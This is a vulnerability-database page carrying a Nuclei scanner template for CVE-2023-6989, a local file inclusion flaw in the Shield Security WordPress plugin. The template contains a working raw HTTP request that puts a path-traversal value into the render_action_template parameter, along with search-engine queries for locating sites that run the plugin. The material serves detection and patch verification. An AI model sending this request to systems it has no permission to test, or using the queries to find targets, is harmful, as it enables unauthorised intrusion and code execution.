Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-6989
HistoryApr 30, 2024 - 9:03 a.m.

Shield Security WP Plugin <= 18.5.9 - Local File Inclusion

2024-04-3009:03:59
ProjectDiscovery
github.com
10
cve
wordpress
wp-plugin
lfi
shield-security
vulnerability
render-action-template
unauthenticated-attacker
php-code
server

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.6 High

AI Score

Confidence

High

0.154 Low

EPSS

Percentile

95.9%

The Shield Security Smart Bot Blocking & Intrusion Prevention Security plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 18.5.9 via the render_action_template parameter. This makes it possible for unauthenticated attacker to include and execute PHP files on the server, allowing the execution of any PHP code in those files.
id: CVE-2023-6989

info:
  name: Shield Security WP Plugin <= 18.5.9 - Local File Inclusion
  author: Kazgangap
  severity: critical
  description: |
    The Shield Security Smart Bot Blocking & Intrusion Prevention Security plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 18.5.9 via the render_action_template parameter. This makes it possible for unauthenticated attacker to include and execute PHP files on the server, allowing the execution of any PHP code in those files.
  reference:
    - https://wpscan.com/vulnerability/a485aee7-39a0-418c-9699-9afc53e28f55/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6989
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-6989
    cwe-id: CWE-22
    epss-score: 0.11562
    epss-percentile: 0.95251
    cpe: cpe:2.3:a:getshieldsecurity:shield_security:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: getshieldsecurity
    product: shield_security
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/wp-simple-firewall
    fofa-query: body=/wp-content/plugins/wp-simple-firewall
    publicwww-query: "/wp-content/plugins/wp-simple-firewall"
  tags: wpscan,cve,cve2023,wp,wordpress,wp-plugin,lfi,shield-security,getshieldsecurity

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        action=shield_action&ex=generic_render&exnonce=5a988a925a&render_action_template=../../icwp-wpsf.php

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"dashboard_shield"'
          - '"shield_action"'
          - '"search_shield"'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4a0a0047304502205a17df05a5919ecaed61f2ff2fa97b35c5837b3faeacc17c8fa58e1a36117922022100d5bd45067c0fcd14a7bf2caeb7d39376091b6ae3cc5da4216d635e3fb53d0cc6:922c64590222798bb761d5b6d8e72950

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.6 High

AI Score

Confidence

High

0.154 Low

EPSS

Percentile

95.9%

Related for NUCLEI:CVE-2023-6989